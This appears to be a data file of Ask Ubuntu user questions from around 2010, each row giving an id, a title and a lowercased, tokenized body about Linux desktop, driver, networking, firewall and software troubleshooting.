8060	configure : error : *** unable to locate tk includes	i am trying to install the latest stable release of grass gis from svn . in the stage of running configure command i get the following error at the last stage . checking for location of tcl/tk includes ... /usr/include/tcl8.5 checking for tcl.h ... yes checking for tk.h ... no configure : error : *** unable to locate tk includes . the command i run for configuration is - ./configure -- with-tcltk-includes=/usr/include/tcl8.5 -- with-proj-share=/usr/share/proj can anyone suggest me what i am missing ?
8061	alternatives to unity for netbooks ?	i am very disappointed with some of the features of unity . not being able to hide the bar or even modify it with different shortcuts ( favorites in 10.04 netbook remix ) . i have docky installed and i would prefer to just use that . but i want to still have the system administration programs somehow . what packages would anyone recommend as a replacement for unity ?
8063	is there a way to change the screen resolution ?	i have an acer aspire one , with screen resolution of 1024x600 . standard monitor resolution that is closest to this is 1024x768 . is there a way to `` compress '' a programs output to the screen ( assuming it wants to display on a 1024x768 screen ) so that it is viewable on a non standard resolution ( 1024x600 ) the problem i have is that citrix is trying to use 1024x768 but my screen is 1024x600 . this ends up cutting off the bottom 168 pixels at the bottom of the image . often this makes the citrix program unusable since many gui forms have buttons somewhere in this cutoff area . is there a way to fix this ?
8067	best flash player on ubuntu ?	when i encounter a flash video in ubuntu i get an option to install 3 different swf players : adobe swfdec gnash which is the most stable and preferred player ?
8070	external monitor with no mouse cursor	i am using a fujitsu siemens amilo l7310 laptop computer with an external monitor . i 'm wishihg to use version 10.04 . the problem is , when i plug my laptop into the external monitor with my laptop screen turned either on or off , i do not see the mouse cursor on the external monitor ! the mouse cursor is still there , although invisible . if i connect the external monitor to my laptop before swithing both on , the same happens . is there any solution to make the cursor appear on the monitor ?
8077	how to use mouse scroll to hide windows ?	i used to set the mouse scroll to hide the windows when scrolling on the title bar : alas , i ca n't remember how i did that ... can you please tell me how to achieve it ?
8079	how do i configure the `` print_to_pdf '' -printer and where does it print to ?	i have a printer queue called `` print_to_pdf '' . i do n't know why and where from i have it , and also not how i can configure it . if i print using that printer , i can not find the output file anywhere .
8086	how to do a clean reinstall of initramfs	i was getting the error mentioned in this post on ubuntu 10.04 . i upgraded to ubuntu 10.10 through software update and again i 'm getting this error . mount : mounts none on /dev/pts failed : device here is the boot log : ip-config : no response after 4 secs - giving up /scripts/init-premount/dropbear : line 32 : ipconfig : not found /scripts/init-premount/dropbear : line 32 : ipconfig : not found /scripts/init-premount/dropbear : line 32 : ipconfig : not found /scripts/init-premount/dropbear : line 32 : ipconfig : not found /scripts/init-premount/dropbear : line 32 : ipconfig : not found /scripts/init-premount/dropbear : line 32 : ipconfig : not found /scripts/init-premount/dropbear : line 32 : ipconfig : not found /scripts/init-premount/dropbear : . : line 32 : ca n't open '/tmp/net-*.conf' fsck from util-linux-ng 2.17.2 i had purged dropbear , and it looks like some scripts are still remaining . is it possible to do a clean re-install of initramfs ? edit 1 : sudo update-initramfs -u does n't solve the issue . also sudo update-initramfs -c -k all also does n't solve the issue .
8089	extracting multiple file types while ignoring errors	system info : aggitan @ moneque : ~ $ uname -a linux moneque 2.6.32-25-generic # 44-ubuntu smp fri sep 17 20:05:27 utc 2010 x86_64 gnu/linux aggitan @ moneque : ~ $ 7z 7-zip 9.04 beta copyright ( c ) 1999-2009 igor pavlov 2009-05-30 p7zip version 9.04 ( locale=en_us.utf8 , utf16=on , hugefiles=on,2 cpus ) i 've got a folder that has 68 archives in it ranging from .rar , .ace , & .zip . i want to extract all of these files using their folder name as the first directory ( `` extract here '' ) if i use file-roller it halts at the first error , there does n't appear to be an `` ignore error '' flag for file roller . if i use 7zip it dumps everything into the current folder and does n't use clean folders how can i extract everything into separate folders without spilling everything into the current directory ?
8095	how can i read system mail ?	which packages need to be installed in order for system mail to be generated from for example a nightly rkhunter scan run by cron ?
8102	installing ubuntu server on 180 machines - what tool ( s ) do i have ( except clonezilla )	i need to install ubuntu on 180 servers . since all are identical hardware , i want to install ubuntu on a single machine , and clone that image to the rest , and create a post installation script for machine specific settings ( e.g . ip address , etc. ) . i wonder what tools are available for such type of operation .
8105	laptop works fine with ac adapter , hangs after login screen using battery	i did an ubuntu 10.10 desktop edition clean install ( amd64 version ) on a notebook medion akoya e1311 . with ac adapter everything works fine , but using battery , it hangs after login screen . i can type login , password too , and i can press login button . but then i can see mouse cursor and lower task bar , not upper , and nothing works . the only thing i can do is login on a terminal with ctrl+alt+f1 , this is ok . nothing seems alive on gnome except mouse cursor . the only thing i did after ubuntu fresh install was donwloading driver for rtl8191se from realtek web , because wifi did n't work , now works fine , with ac adapter of course . hardware is a notebook medion akoya e1311 amd sempron 210u 1 gb ddr2 ati rs690m ( radeon x1200 series ) western digital 160gb wireless rtl8191sevb ethernet rtl8101e/rtl8102e
8108	what does this ufw log mean ?	cc-02 kernel [ 399.656733 ] [ ufw block ] in=eth0 out= mac= src=192.168.2.11 dst=192.168.2.22 len=60 tos=0x00 prec=0x00 ttl=64 id=14158 df proto=tcp spt=47368 dpt=22 window=5840 res=0x00 syn urgp=0 the output from sudo ufw status verbose status : active logging : on ( low ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip to action from -- -- -- -- -- -- anywhere allow in 192.168.2.0/24 137,138/udp ( samba ) anywhere allow in 192.168.2.0/24 139,445/tcp ( samba ) 22 allow in 192.168.2.0/24 i am trying to ssh to cc-02 using ssh server @ cc-02 but i get `` could not resolve host name '' . but replacing cc-02 with the ip address works fine . i have checked /etc/hosts and /etc/hostname and i have them configured properly . i do n't exactly know what the log really means . do i need to open another port ?
8112	how do i detect when the system suspends ?	i need to be able to log the times that an ubuntu 10.04 desktop system is suspended and resumed . i can detect when the system is resumed via a dbus signal ( org.freedesktop.upower.resuming ( ) ) but the corresponding `` org.freedesktop.upower.sleeping ( ) '' signal is never fired . ideally , i 'd like to use dbus , but given the lack of success i 'm having , i 'd be happy with any solution providing it can be called from the command line . i 've discovered one way to do it : tail -f /var/log/pm-suspend.log | grep `` performing suspend '' this simply listens on one of the pm logs for the suspend logging . although this works , it 's probably rather brittle . i 've found relying on log parsing to be rather problematic in the past due to changes in the log statements . ideally i 'd like a more robust mechanism . the service that invokes this will be ran as root .
8116	how to install ubuntu on microsoft server 2008 r2 hyper-v ?	is there a way ( now or in the future ) to install ubuntu-server-64 on a microsoft server 2008 r2 hyper-v ? i tried this quide : http : //www.panterlo.com/2010/10/10/ubuntu-10-10-and-hyper-v-r2/ but you 're never sure if ubuntu starts or not and if it 's up and running the network fails after a very short time . 2011-11-04 by v.m . : and `` how run ubuntu desktop v11.10 ( or kubuntu desktop v11.10 ) as livecd as guest in hyper-v ? ''
8119	accidentally inverted the colour of all windows	i fat fingered a short-cut in thunderbird and now the colours of all my application windows are inverted . i 'm not sure what combination i hit ( i was trying for alt-1 ) . how do i get my colour scheme back to normal ?
8121	are there any good usb 5.1 or 7.1 channel sound cards that work in linux ?	i 'm trying to get a sound card that will plug into a really new mini-itx board . that leaves me with pcie or usb , and pcie cards seem to be expensive , crappy , and they required expensive riser and extension cards for mini-itx boards . i have an old sound blaster live 5.1 that sounds great , but new mini-itx boards do n't have any pci slots . here are some options i 've found , and why they wo n't work : turtle beach audio advantage micro ii : it 's only stereo , not 5.1 creative sound blaster x-fi surround 5.1 sb1090 : people on newegg says it does n't work in linux aureon 5.1 usb mkii : discontinued , and only available in europe various pcie cards at newegg : the first two creative ones have crap reviews , and the rest are really expensive .
8125	clone ubuntu machine	i have an install of ubuntu maverick on slicehost , that i 'd like to replicate on a different machine ( a kvm vm install ) . is there a simple way of mirroring all it ? i mainly care about installed programs , installations , mysql + postgres config/data . okay.. so i guess i mainly care about everything . maybe except for network config , which i can fix easily enough .
8136	c programing suites/ides	i know that asking for something like visual studio is too much but something that will let me write , debug and compile in a gui instead of the command line is good enough for me . ( not that i 'm lazy , but i do n't have time to learn the necessary commands ... )
8143	is ubuntu 10.04 's “blank screen blinking with white stripes problem” resolved in ubuntu10.10 ?	in ubuntu 10.04 the os crashes frequently by displaying `` blank screen blinking with white stripes problem '' . this problem exists fpr intel 8xx series chipset users . now i want to know whether this issue is resolved in ubuntu 10.10 or not ?
8148	what 's the best way to automatically apply server updates ?	what 's the best way to automatically apply security updates ? or any updates for that matter ?
8149	how can i restrict program access to other users ?	i 'm setting up a new user account , and i want to allow access to only certain programs for just that account . how would i go around doing that ?
8155	mysql gui tools	does anyone have any good ideas as to native mysql gui clients for ubuntu ? so far i 've tried mysql workbench , which never seemed to work properly , phpmyadmin which i found a bit slow , and navicat which is a windows port and runs under wine , but none of these is perfect . in an ideal world , i 'm looking for something like a native version of navicat .
8159	what performance differences are there when installing with wubi ?	i know that wubi is slower in disk io , but i ca n't find anything about it online other than vague statements such as `` slightly slower disk seeks '' . has anyone done any benchmarks to quantify the speed difference ?
8163	redirect http page to another inside my computer ?	how can i automatically redirect a website to an html page inside my computer ? i need to do this everytime i try to access the website in my ubuntu . thanks .
8173	simple vj software for background video in live concert	here 's what i am trying to accomplish : i have a bunch of avi videos between which i need to switch back/forth as songs play in the concert . the only requirements for the software are that : videos need to be seamless ( no player gui showing up on the projection ) i can go to previous/next video in the playlist through the keyboard when switching between videos in the playlist , there should be a cross-fade or fade-out / fade-in transition . can you point me towards a piece of software that can do that for me ? thanks !
8177	simple rss feed manipulation software	i like the functionality of yahoo pipes , but do n't want to leave the task of processing rss feeds to a privately owned web service which might disappear tomorrow and i do n't exactly trust my data with . i 'd like to do this with software i can run locally ( on a server or desktop ; does n't matter ) . there must be something out there that handles some of the basic functionality of pipes such as merging feeds , filtering , querying for keywords , etc . but i 'm having a hard time finding it . there are various parsers that might do the job , but they 're overly flexible and require much configuration upfront . ideally i 'd have something in the lines of a simple command that i can run in a cron job , or a daemon , which will fetch some feeds , perform the operations i want , and output or serve the resulting rss feed . any pointers appreciated .
8179	how to put videos on a sony walkman nwz-s545 ?	so i have heard that it needs to be resized and be a different file type i think . how can i do this in ubuntu ? thanks !
8181	what are interesting uses for a web cam beyond video chat ?	i 'd like pointers/suggestions to any interesting applications that have been created for a laptop web cam beyond self recording and video chat . specifically , i 'd like setups that are ready to go rather than ideas for software that might developed in the future .
8183	troubleshooting a wireless connection that drops out regularly	i have a netgear wireless usb receiver in my desktop , that connects to my router ( tried both dlink and belkin ) prefectly fine , however will simply disconnect after minutes , 10s of minutes , a couple of hours ( no real pattern ) at which time i will need to unplug and reinsert my usb receiver and reauthenticate to the router . it appears to be happening alot more frequently when the pc is left unused for a while , and goes to the screen saver . this has been hapenning on 10.04 and 10.10 ( gnome ) ( and possibly 9.10 as well , though i have updated my gear since then ) rather than expect someone to give me a magic bullet solution ( that i 'm happy to get : ) ) , as a novice user , what should i be looking at to troubleshoot this ? i have looked at this question already , and to my ( limited ) understanding , do n't see that it addresses the issue , unless there is someway of ascertaining what chipset it used . edit looks like there are 2 drivers for the wn111 v2 , the first does not support n routers , and the second is 'n speeds not verified ' . i may have to shop around for a better one : /
8184	firewall settings for personal file sharing	i have ufw set up to allow samba connections , but this does not seem to allow files to be transferred through ubuntu 's `` personal file sharing '' using the public folder . the share can be seen , but not accessed if the firewall is active . are there extra ports that need to be opened ? the default ufw profile opens ports 137 , 138 , 139 and 445 . to this , i 've added 135 and 80 , but so far , no joy . i do see connection attempts coming in on high ports ( 32k+ ) but these are blocked .
8185	how to import a directory tree into darktable	when i try to `` import filmroll '' into darktable , i ca n't see how to tell it to include all subdirectories . any tips ?
8189	is there a way to make the update manager display more frequently ?	just wondering is there a way to make the update manager display on screen automatically straight away after you do a sudo apt-get update or if it is does this it self . more often than not i always have to do a sudo apt-get upgrade instead ?
8192	rss reader which caches pages	does anyone know of an rss reader for linux which will cache the pages that are linked to in the stories ? really handy for travellers who are often out or wifi range .
8194	cream is a tweaked version of vim . does cream lack any of vim 's power ?	i 've very recently started trialing vim , and i like what it can do , but its unfamiliar keybindings and modes of operation are daunting . i want that sort of power in a text-editor ... but if i do n't need to change my keyboard habits so drastically , i 'd be happier . i read that cream is built directly onto a vim base , so i tried it . cream feels a bit more like the type of text-editor i am used to ; notepad++ notepad++ is windows-only , and is too buggy in wine , and i 'd rather a cross-platform solution ... but ... can cream do everything that vim can ? is cream restricted in any way by tweaking vim so far out of its natural shape ?
8200	make use of newer wireless drivers which are activated but not in use	i have 10.10 installed on a netbook with rt3090 hardware and the driver ubuntu installed was of rt2800 , it functions properly , but i decided to get the appropriate drivers , so i did the `` make , make install '' routine and restarted but the driver has n't changed , and when i checked the `` additional hardware '' utility i see that the rt3090 driver is `` activated but not in use '' . so my question is how to use it ?
8201	ca n't start up gcompris	i installed the ubuntu-edu-primary pacakage successfully , and went to start gcompris from the education menu , but got nothing .
8205	how to view chm files ?	how to view chm files in ubuntu ?
8209	what is the best way to develop apps for ubuntu ?	i want to write applications for ubuntu . i do not know much about programming but i want develop for ubuntu . i am trying to learn python right now . what do you think is the best way to develop apps for ubuntu ? can you point me to some resources that can help me get started with developing for ubuntu ? related ubuntu forums thread .
8226	is there a way to completely remove the keyboard layout from the indicator ?	i need to completely remove the indicator , no flags , no abbr . nothing ! i was able to do it in 10.04 using a gconf key that has no scheme and i heard that a proper scheme will be available in 10.10 but i ca n't find anything .
8227	tailing two log files	i have a web application that outputs to a number of log files with performance information . one log file outputs code execution times and another outputs sql timings . i have no control over the logger or the code that produces the log files , but i want to output the logs in one place . currently i am doing something like this tail -f sqllogs.log | grep sql-time tail -f perflogs.log | grep exec-time this outputs something to the console every time an sql is executed in the application . but i have to run the code in two separate ssh sessions . however , what i want to be able to tail both files , in the same ssh session . is this possible ?
8231	what does `` libraries not eligible '' mean as part of the application review process ?	i read the application review process and i ' ve got a question . in the `` what apps are eligible '' section there is something which i do n't understand : no other software can depend on the application being submitted ( e.g . development libraries are not eligible ) . somebody can explain it with an example please..
8233	can not upgrade server edition	can someone tell me how can i upgrade my ubuntu server 10.04 to ubuntu server 10.10 ? i try : sudo apt-get install update-manager-core sudo do-release-upgrade output : checking for a new ubuntu release no new release found sudo apt-get dist-upgrade output : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
8235	not booting from laptop when trying to boot from an external usb drive	i installed ubuntu to usb ext drive from cd from my desktop , where it boots perfectly from usb hard drive . however , it does not boot from my laptop . laptop hangs with a blinking cursor . can you please help ? thanks .
8238	is it possible to do a regex find in cream ( vim 's derivative ) via the dialogs ?	in cream , i simply ca n't find the regex option mentioned on cream 's info page basic features * find and find/replace dialogs use intuitive search , with regular expressions as an option ( ctrl+f and ctrl+h ) . but the find/replace dialogs do n't have a check-box or bullet-point to enable/disable regex . i even tried using a regex in the find-field , but to no avail . in the ( ctrl+f ) find dialog : e.*a ... does not find zebra toggling into expert mode does allow vim style commandline searches , which are regex , but the basic features list says that regex is available via the dialogs . is it possible to do a regex find in cream via the dialogs ?
8241	what is the process for getting paid apps into the ubuntu software center ?	what is the process for getting paid apps into the ubuntu software center ?
8243	how does my computer suspend ?	trying to understand how suspend works in 10.10. http : //git.webconverger.org/ ? p=home.git ; a=blob ; f=.bashrc ; h=8ba57b877e31a03c5f0b1675b42f747d81dd31ad ; hb=head # l31 i use an alias suspend='sudo /etc/acpi/sleep.sh & & sudo alsactl init 0 the alsactl bit is to re-init my sound card which sometimes does not come out of suspend correctly . and then : /etc/acpi/sleep.sh - > /usr/sbin/pm-suspend - > /usr/lib/pm-utils/bin/pm-action - > /usr/lib/pm-utils/pm-functions irony is /usr/lib/pm-utils/bin/pm-action claims to be `` simple suspend script '' . still do n't know how it works . i think i directly used s2ram before .
8247	problems with graphics of sony vaio z	i have problem with my sony vaio z vpcz1 . it has physical selector of gpus which linux kernel does not detect . so after grub i see black display ( i tried different distributions of ubuntu and other linux os ) . i read in ubuntu 10.10 was solve same problem with hybrid graphics but not in my case i found solutions ( not easy at do ) for oldest models . ps . for more information i found different webs : https : //docs.google.com/document/edit ? id=1dxdty2ygnjwq_i8zmvzxdmmxbp6g4hjadjlfvfts034 & hl=en & pli=1 update ( 2011.04.30 ) : i tried update to ubuntu 11.04 on my vpcz11c5e and all work ( without any patch ) fine less intel gpu ( only works nvidia ) .
8250	weird issue with iptables redirection	i am trying to redirect all incoming traffic on udp port 5060 to port 56790 , and all outgoing traffic from 5060 to the port 56789 . i used these iptables rules : iptables -t nat -i prerouting -p udp ! -s localhost -- dport 5060 -j redirect -- to-port 56790 iptables -t nat -i output -p udp ! -s localhost -- sport 5060 -j redirect -- to-port 56789 i listen on both ports using raw sockets after setting the interface to promiscuous mode using ioctl . i see packets only on 56789 i.e.sending side , and i do not see any packets on 56790 , while wireshark shows that many packets are delivered to port 5060 . why would this happen ? any ideas ? do you think it 's a problem with iptables rules or something to do with raw sockets ? [ this is ubuntu 10.04 and iptables v1.4.4 ]
8252	how to launch default web browser from the terminal ?	i was wondering what 's the terminal command to open the default web browser .
8258	streaming on low level dsl	i got dsl 2000 ( 280k/bits down , 19 up to 40 k/bits up ) , now i want to stream me for example coding live , so at a low fps rate . would this be possible , and which tool / provider should i use for such low fps rated streaming ? ( feel free to post windows tools , if there are no matching available for linux ) regards ,
8269	microphone alsa noise	i 've got two microphones . both works good under windows . if i use them under ubuntu the first one ( call it x ) works fine , but the second one ( call it y ) produces a lot of high-frequency noise . i know , the best thing to do is to buy a new microphone , but x is really old and the headset are broken , y is almost new and works fine under windows . is there any way to apply a low-pass filter in alsa ? i 've also noticed that the sound is a little bit softened ... like a telephone quality input . my soundcard is : 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) i 've got a toshiba notebook and i 've just tried to edit the alsa config file adding this line : options snd-hda-intel model=auto ~ update ~ if i use arecord test.wav -f cd everything works fine .
8270	how do i install compiz in xubuntu ?	how can i properly set up compiz in xubuntu ?
8272	upgrading to 10.10 has made the terminal go crazy	i asked this question on the unix/linux se and someone suggested i try my luck here . the problem is this : since upgrading to 10.10 , the terminal has gone a little funny . here 's a picture of the problem : the problem affects xterm but not gnome-terminal . i also get similar weird artefacts in emacs ( though only after i alt-tab away and back to the window for the first time ) . ctrl-l or moving the window or alt-tabing away and then back again makes the lines disappear . someone asked about the problem on ubuntu forums with no luck so far .
8276	compiz-like effects in gnome shell ?	in gnome-shell we do not have compiz any more ? in kde4 we have the native desktop effects , i would like to know if the gnome-shell we will need yet of compiz .
8277	losing network connection after hibernate	when i hibernated my computer and i fire him back up , my network connection is lost in about 50 % of the cases . the network applet finds other networks , but it ca n't find the network i was connected to before the hibernate . i have this most of the time with a wired connection but it also happens with a wireless connection . i 've tried re-plugging the cable ( or switching off and on the wireless card ) , disabling the network via the network applet and re-enable it . the only thing that works is the following : log out log in back again disable all networks enable them again
8279	how can i log my ssd 's read performance over time ?	i 'd like to keep a log over time , perhaps weekly , of my solid state drive 's read rate as determined by a tool like system - > administration - > disk utility - > benchmark : is there a way to archive the test data from disk utility , or can you think of any other tools that would allow me to accumulate this kind of data semi-automatically ? i would like to be able to perform the benchmark using read-only methods so as not to unnecessarily wear the drive .
8280	empathy with webcam	when empathy will have camera support ? and i have problem to change files with it too . after 11.04 the next topic of canonical have to be to improve the empathy . the program is waek yet .
8285	can you get vmware server 1.0.x to work ?	i 'm trying to install vmware server 1.0.10 ( released 2009-10-26 ) on ubuntu 10.04 . ( why not 2.0 ? well , i 've tried 2.0 ; did n't like its ui and had some other issues with it too , and i know 1.0.x does everything i need . ) when i run sudo ./vmware-install.pl , it fails thusly : none of the pre-built vmmon modules for vmware server is suitable for your running kernel . do you want this program to try to build the vmmon module for your system ( you need to have a c compiler installed on your system ) ? [ yes ] using compiler `` /usr/bin/gcc '' . use environment variable cc to override . what is the location of the directory of c header files that match your running kernel ? [ /lib/modules/2.6.32-24-generic/build/include ] extracting the sources of the vmmon module . building the vmmon module . using 2.6.x kernel build system . make : entering directory `/tmp/vmware-config0/vmmon-only' make -c /lib/modules/2.6.32-24-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . modules make [ 1 ] : entering directory `/usr/src/linux-headers-2.6.32-24-generic' cc [ m ] /tmp/vmware-config0/vmmon-only/linux/driver.o in file included from /tmp/vmware-config0/vmmon-only/./include/vmware.h:25 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:48 : /tmp/vmware-config0/vmmon-only/./include/vm_basic_types.h:104:7 : warning : `` __freebsd__ '' is not defined in file included from /tmp/vmware-config0/vmmon-only/./include/x86.h:20 , from /tmp/vmware-config0/vmmon-only/./include/machine.h:24 , from /tmp/vmware-config0/vmmon-only/linux/driver.h:15 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:49 : /tmp/vmware-config0/vmmon-only/./include/x86apic.h:79:1 : warning : `` apic_base_msr '' redefined in file included from /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/apic.h:11 , from /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/smp.h:13 , from /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/mmzone_64.h:12 , from /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/mmzone.h:4 , from include/linux/mmzone.h:783 , from include/linux/gfp.h:4 , from include/linux/kmod.h:22 , from include/linux/module.h:13 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:12 : /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/apicdef.h:136:1 : warning : this is the location of the previous definition in file included from /tmp/vmware-config0/vmmon-only/./include/x86.h:21 , from /tmp/vmware-config0/vmmon-only/./include/machine.h:24 , from /tmp/vmware-config0/vmmon-only/linux/driver.h:15 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:49 : /tmp/vmware-config0/vmmon-only/./include/x86desc.h:593:7 : warning : `` _msc_ver '' is not defined in file included from /tmp/vmware-config0/vmmon-only/./include/machine.h:24 , from /tmp/vmware-config0/vmmon-only/linux/driver.h:15 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:49 : /tmp/vmware-config0/vmmon-only/./include/x86.h:830:1 : warning : `` pte_pfn_mask '' redefined in file included from /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/paravirt.h:7 , from /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/irqflags.h:60 , from include/linux/irqflags.h:57 , from /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/system.h:11 , from /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/processor.h:17 , from include/linux/prefetch.h:14 , from include/linux/list.h:6 , from include/linux/module.h:9 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:12 : /usr/src/linux-headers-2.6.32-24-generic/arch/x86/include/asm/pgtable_types.h:182:1 : warning : this is the location of the previous definition in file included from /tmp/vmware-config0/vmmon-only/./include/vcpuset.h:78 , from /tmp/vmware-config0/vmmon-only/./include/modulecall.h:22 , from /tmp/vmware-config0/vmmon-only/./common/vmx86.h:18 , from /tmp/vmware-config0/vmmon-only/linux/driver.h:16 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:49 : /tmp/vmware-config0/vmmon-only/./include/vm_atomic.h:226:7 : warning : `` _msc_ver '' is not defined /tmp/vmware-config0/vmmon-only/./include/vm_atomic.h:230:7 : warning : `` _msc_ver '' is not defined /tmp/vmware-config0/vmmon-only/./include/vm_atomic.h:298:7 : warning : `` _msc_ver '' is not defined /tmp/vmware-config0/vmmon-only/./include/vm_atomic.h:304:7 : warning : `` _msc_ver '' is not defined [ ... ] /tmp/vmware-config0/vmmon-only/./include/vm_atomic.h:1454:7 : warning : `` _msc_ver '' is not defined /tmp/vmware-config0/vmmon-only/./include/vm_atomic.h:1587:7 : warning : `` _msc_ver '' is not defined in file included from /tmp/vmware-config0/vmmon-only/linux/driver.h:20 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:49 : /tmp/vmware-config0/vmmon-only/./include/compat_wait.h:37:5 : warning : `` vmw_have_epoll '' is not defined /tmp/vmware-config0/vmmon-only/./include/compat_wait.h:43:5 : warning : `` vmw_have_epoll '' is not defined in file included from /tmp/vmware-config0/vmmon-only/linux/driver.h:20 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:49 : /tmp/vmware-config0/vmmon-only/./include/compat_wait.h:60 : error : conflicting types for ‘poll_initwait’ include/linux/poll.h:70 : note : previous declaration of ‘poll_initwait’ was here in file included from /tmp/vmware-config0/vmmon-only/./include/vm_asm_x86_64.h:23 , from /tmp/vmware-config0/vmmon-only/./include/vm_asm.h:28 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:52 : /tmp/vmware-config0/vmmon-only/./include/vm_asm_x86.h:430:7 : warning : `` _msc_ver '' is not defined /tmp/vmware-config0/vmmon-only/./include/vm_asm_x86.h:676:7 : warning : `` _msc_ver '' is not defined /tmp/vmware-config0/vmmon-only/./include/vm_asm_x86.h:716:7 : warning : `` _msc_ver '' is not defined in file included from /tmp/vmware-config0/vmmon-only/./include/vm_asm.h:28 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:52 : /tmp/vmware-config0/vmmon-only/./include/vm_asm_x86_64.h:40:7 : warning : `` _msc_ver '' is not defined in file included from /tmp/vmware-config0/vmmon-only/linux/vmhost.h:13 , from /tmp/vmware-config0/vmmon-only/linux/driver.c:71 : /tmp/vmware-config0/vmmon-only/./include/compat_semaphore.h:5:27 : error : asm/semaphore.h : no such file or directory /tmp/vmware-config0/vmmon-only/linux/driver.c:146 : error : unknown field ‘nopage’ specified in initializer /tmp/vmware-config0/vmmon-only/linux/driver.c:147 : warning : initialization from incompatible pointer type /tmp/vmware-config0/vmmon-only/linux/driver.c:150 : error : unknown field ‘nopage’ specified in initializer /tmp/vmware-config0/vmmon-only/linux/driver.c:151 : warning : initialization from incompatible pointer type /tmp/vmware-config0/vmmon-only/linux/driver.c : in function ‘linuxdriver_ioctl’ : /tmp/vmware-config0/vmmon-only/linux/driver.c:1650 : error : ‘struct task_struct’ has no member named ‘euid’ /tmp/vmware-config0/vmmon-only/linux/driver.c:1650 : error : ‘struct task_struct’ has no member named ‘uid’ /tmp/vmware-config0/vmmon-only/linux/driver.c:1651 : error : ‘struct task_struct’ has no member named ‘fsuid’ /tmp/vmware-config0/vmmon-only/linux/driver.c:1651 : error : ‘struct task_struct’ has no member named ‘uid’ /tmp/vmware-config0/vmmon-only/linux/driver.c:1652 : error : ‘struct task_struct’ has no member named ‘egid’ /tmp/vmware-config0/vmmon-only/linux/driver.c:1652 : error : ‘struct task_struct’ has no member named ‘gid’ /tmp/vmware-config0/vmmon-only/linux/driver.c:1653 : error : ‘struct task_struct’ has no member named ‘fsgid’ /tmp/vmware-config0/vmmon-only/linux/driver.c:1653 : error : ‘struct task_struct’ has no member named ‘gid’ /tmp/vmware-config0/vmmon-only/linux/driver.c:1670 : error : too many arguments to function ‘smp_call_function’ make [ 2 ] : *** [ /tmp/vmware-config0/vmmon-only/linux/driver.o ] error 1 make [ 1 ] : *** [ _module_/tmp/vmware-config0/vmmon-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-2.6.32-24-generic' make : *** [ vmmon.ko ] error 2 make : leaving directory `/tmp/vmware-config0/vmmon-only' unable to build the vmmon module . for more information on how to troubleshoot module-related problems , please visit our web site at `` http : //www.vmware.com/download/modules/modules.html '' and '' http : //www.vmware.com/support/reference/linux/prebuilt_modules_linux.html '' . execution aborted . am i missing some required kernel header packages , or is there something else i can do to fix this ? or does someone know already that you just ca n't get these pieces of software to work together ? update turns out that to get vmware server 1.0.x working , compiling the kernel module is n't enough , but i 'd need to compile my own kernel . while that 's certainly doable , for this particular need i think that 's a bit too much work .
8289	ubuntu tweak not showing all the menus	ubuntu-tweak does n't have the option startup which includes session manager session control and few other options are not there . i am running the latest version available to download . i remember having all those menus in lucid . for a better difference comparison see the menus in the ubuntu tweak homepage http : //ubuntu-tweak.com/ with mine ... . how can i get these option back . here is the error i get when i run ubuntu tweak from terminal error : dbus.proxies : introspect error on :1.142 : /com/ubuntu_tweak/daemon : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.accessdenied : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.141 '' ( uid=1000 pid=16550 comm= '' /usr/bin/python ) interface= '' org.freedesktop.dbus.introspectable '' member= '' introspect '' error name= '' ( unset ) '' requested_reply=0 destination= '' :1.142 '' ( uid=0 pid=16560 comm= '' /usr/bin/python ) ) update : i installed the same deb on another computer and that has nothing wrong . all the menus are listed fine .
8290	writing drivers & stuff : sources for learning	are there good sources for learning how to write drivers for webcams , electronic devices and stuff for linux ? besides reading the source code : p
8295	how to enable kdelicious in konqueror ?	i have the package kdelicious installed ( maverick ) , and would expect to use its extensions in konqueror . how do i enable it ?
8299	live cd installer shuts down	i am trying to boot a live cd into a live session or to use the installer . however , once it starts , it shuts down again to no signal . i know the iso is good as i have checked it and it also runs correctly on other computers . compaq sr 2014 2gb ram all rest stock . i can get other distributions to boot from cd but i ca n't get ubuntu or mint to work . what can i do to diagnose , and hopefully solve the problem ?
8301	how to send all-notes-off alsa midi event ?	i am writing a midi sequencer in c++ using asoundlib . sometimes i would like my application to stop all voices , calling an all-notes-off event . i do it by calling a note-off to every note at every channel , since this is the only way i know , but for some reasons i am not really happy to send 16*128=2048 events in one moment . is there any other approach to that ? it would be perfect if i could send an event to the control queue , is there any ? if not , then what is the way it should be done ? any help is welcome , since the internet lacks a good , detailed alsa documentation .
8302	how can the ubuntu font be used with lyx or latex ?	i use lyx for creating documents and would like to be able to format the output of my documents so that they use the ubuntu font . in the lyx document settings , it appears that there are only a fixed number of fonts available . is it possible to add the ubuntu font to this list ? if not , is there a way to use the ubuntu font in latex ? i can export the lyx document to latex , make my changes and then use pdflatex & co. to create a formatted document .
